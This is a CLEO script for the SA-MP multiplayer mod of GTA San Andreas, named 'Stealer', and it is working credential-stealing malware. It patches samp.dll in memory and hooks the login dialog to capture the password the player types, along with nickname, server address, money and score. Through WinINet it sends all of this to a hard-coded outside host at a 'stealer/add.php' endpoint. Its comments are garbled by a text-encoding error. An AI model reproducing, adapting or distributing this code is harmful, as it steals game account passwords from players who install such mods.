{$CLEO}
{$NOSOURCE}
0000:
wait 1750
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // Aioee?aoa?
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0@ += 371500
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0@ += 9
0A8C: write_memory 0@ size 4 value -1869574000 virtual_protect 1
0@ += 4
0A8C: write_memory 0@ size 1 value 144 virtual_protect 1
0AB1: call_scm_func @Thread 1 @Stealer
// Ne?eio
While True
wait 0
end
0a93: //A ooo caeai?eaaaony
:Stealer
0000:
While true
wait 0
0AA2: 31@ = load_library "kernel32.dll" // IF and SET
0AA4: 30@ = get_proc_address "GetModuleHandleA" library 31@ // IF and SET
0AA7: call_function 30@ num_params 1 pop 0 "samp.dll" 0@
0A8E: 3@ = 0@ + 2173568 // int
0A8D: 2@ = read_memory 3@ size 4 virtual_protect 1
if 2@ > 1000
then
0A8E: 22@ = 2@ + 985 // int
0A8D: 23@ = read_memory 22@ size 4 virtual_protect 1
if 2@ > 1000
then
0A8E: 5@ = 23@ + 20 // int
0A8D: 4@ = read_memory 5@ size 4 virtual_protect 1
if 4@ > 1000
then
0A8E: 5@ = 4@ + 34 // int
0A8D: 24@ = read_memory 5@ size 4 virtual_protect 1
if 24@ > 1000
then
0A8E: 22@ = 0@ + 2173504 // int
0A8D: 1@ = read_memory 22@ size 4 virtual_protect 1
if 1@ > 1000
then
0A8E: 7@ = 1@ + 40 // int
0A8D: 6@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 5@ = 1@ + 44 // int
0A8D: 26@ = read_memory 5@ size 4 virtual_protect 1
if 6@ == 1
then
if or
26@ == 1
26@ == 3
then
25@ = 1
end
end
if and
25@ == 1
not 6@ == 1
then
0A8E: 7@ = 1@ + 48 // int
0A8D: 3@ = read_memory 7@ size 4 virtual_protect 1
0A8E: 6@ = 1@ + 36 // int
0A8D: 13@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 6@ = 0@ + 617008 // int
0AA8: call_function_method 6@ struct 13@ num_params 0 pop 0 5@
0A8E: 6@ = 4@ + 26 // int
0A8D: 23@ = read_memory 6@ size 4 virtual_protect 1
0A8E: 7@ = 4@ + 10 // int
if not 23@ >= 16
then
0085: 12@ = 7@ // (int)
else
0A8D: 12@ = read_memory 7@ size 4 virtual_protect 1
end
0A8E: 9@ = 2@ + 710 // int
0A8E: 14@ = 2@ + 452 // int
0A8E: 8@ = 2@ + 969 // int
0A8D: 15@ = read_memory 8@ size 4 virtual_protect 1
call @PlayerActive 0 to 33@
if 0@ == 1
then // spawned
wait 2000
call @upd_tab 0
wait 500
0A8E: 18@ = 4@ + 42 // int
0A8D: 27@ = read_memory 18@ size 4 virtual_protect 1
010B: 21@ = player $PLAYER_CHAR money
0AC6: 0@ = label @Base offset
0AC8: 20@ = allocate_memory_size 1024 //0 - base, 14 - ip, 15 - port, 9 - server, 12 - nick, 3 - dialog, 5 - pass, 21 - money, 27 - score
0AD3: 20@ = format "%snick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d&score=%d" 0@ 12@ 14@ 15@ 9@ 3@ 5@ 21@ 27@
0ac8: 8@ = 256
0ad3: 8@ = "Stealer" //Anee aaoa aaca oiaao ?aniiciaaaou a?aoca?u, oi iia ?aoeo, ?oi ?a?oaa ?caao a?aoca? "Stealer"
0ab1: @InternetOpen 1 {USER_AGENT}8@ to {hSession} 9@ //Ioe?uoea nannee ?a?ac iao "a?aoca?"
0ab1: @InternetOpenUrl 2 {hSession} 9@ {Url} 20@ //Ionueea aaiiuo
0ac9: 8@
0006: 25@ = 0
end
end
end
end
end
end
end
:InternetOpen
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@
0AA7: function 29@ params 5 pop 0 {parameters} 0 0 0 {INTERNET_OPEN_TYPE_PRECONFIG} 0 {AGENT} 0@ {HANDLE} 1@
0ab2: 1 1@
:InternetOpenUrl
0050: @wininet
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@
0AA7: function 29@ params 6 pop 0 {parameters} 0 0 0 0 {URL} 1@ {handleInternet} 0@ {HANLDE} 2@
0ab2: 0
:wininet
0AA2: 30@ = load_library "Wininet.dll"
0051:
:Thread //Iiaee??aiea 2ai iioiea
0A9F: 32@ = current_thread_pointer
000A: 32@ += 16
0A8D: 32@ = read_memory 32@ size 4 virtual_protect 0
0062: 32@ -= 0@ // (int)
0AA7: call_function 4607008 num_params 1 pop 1 32@ 33@
005A: 32@ += 0@ // (int)
000A: 33@ += 16
0A8C: write_memory 33@ size 4 value 32@ virtual_protect 0
000A: 33@ += 44
for 32@ = 0 to 30
0A8C: write_memory 33@ size 4 value 1@(32@,30i) virtual_protect 0
000A: 33@ += 4
end
0ab2: 0
:Base //aa?ann aacu
hex
"http:" 2f 2f "logan-st.url.ph" 2f "stealer" 2f "add.php?" 00
end
:upd_tab
// call @upd_tab 0
0AA7: call_function 0x081E406 num_params 1 pop 0 "samp.dll" 0@
0A8E: 1@ = 0@ + 0x4CA0
0@ += 0x212A80
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 1
0AA6: call_method 1@ struct 0@ num_params 0 pop 0
ret 0
:PlayerActive
// call @PlayerActive 0 to 0@
0AA7: call_function 0x081E406 num_params 1 pop 0 "samp.dll" 0@
0@ += 0x212A80
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 985
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 20
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0@ += 34
0A8D: 0@ = read_memory 0@ size 4 virtual_protect 0
0A8D: 1@ = read_memory 0@ size 4 virtual_protect 0
ret 1 1@